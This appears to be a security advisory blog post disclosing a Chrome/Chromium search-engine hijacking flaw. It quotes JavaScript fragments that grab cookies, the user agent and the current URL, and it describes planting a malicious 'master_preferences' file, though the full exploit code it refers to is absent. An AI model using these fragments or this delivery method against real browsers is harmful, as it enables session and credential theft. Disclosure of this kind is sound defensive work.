In December 2015, Hivint’s Technical Security Specialist — Taran Dhillon — discovered a vulnerability in Google Chrome and the Chromium browser that allows an attacker to intercept sensitive information, authentication data and personal information from a target user.
This issue has been reported to the Google/Chromium team but as of July 2016 has not been rectified.
Chrome Default search settings — with the Google search engine configured as the default search engine
Combined with the fact that Google Chrome is the most popular web-browser with approx. 71.4% of all internet users, this vulnerability presents a significant security risk.
escape(document.cookie);– Which can be used to steal a user’s browser cookies. Browser cookies contain information about the current user and may include: authentication information (which is generated when a user logs into a website to uniquely identify the user’s session), the contents of a user’s shopping cart (on an e-commerce site) and tracking information (used to track a user’s web-browsing habits, geographic location and source IP address).
escape(navigator.userAgent);– Used to display a target user’s web-browser type.
escape(document.baseURI);– Contains the URL of the website the user is currently browsing.
How to check if you’re vulnerable
To check if your web-browser (Google Chrome / Chromium) is vulnerable, perform the following steps:
- Navigate to Settings → Manage Search Engines.
- Scroll to the bottom of the Other Search Engines table.
- Click in the box marked Add a new search engine and enter any text, e.g. poison.
- Click in the box marked Keyword and enter any text, e.g. poison.
- If the colour of the text-box turns from red to white, this indicates your browser is vulnerable.
Replacing the Chrome “master_preferences” file (a file which is used by Chrome to set all of its default settings) is a method an attacker can use to deliver the exploit to a victim machine.
The code below creates a malicious “master_preferences” file which redirects all searches performed by the victim user to the attacker’s web-server (where the attacker receives the victim’s browser cookies, current browser URL and browser software information) and then sends the victim back to their original Google search.
This results in a seamless compromise of the victim user’s web browser that is extremely difficult for them to detect:
This video demonstrates how the vulnerability can be exploited:
- The user is tricked into loading malicious software.
- The malicious software containing the exploit is executed on the victim’s machine when the user opens the Chrome browser and searches ‘pwned’ in their browser
- Information is transmitted and intercepted by the attacker and the victim is then unknowingly redirected back to their search with the attack remaining undetected
How can I prevent myself from being exploited?
Currently, the only effective mitigation is to uninstall and not use Google Chrome or Chromium. Additionally, do not click on untrusted links on websites or open attachments or links in emails that are unexpected, from untrusted sources or which otherwise seem suspicious.
Article by Taran Dhillon, Security Specialist, Hivint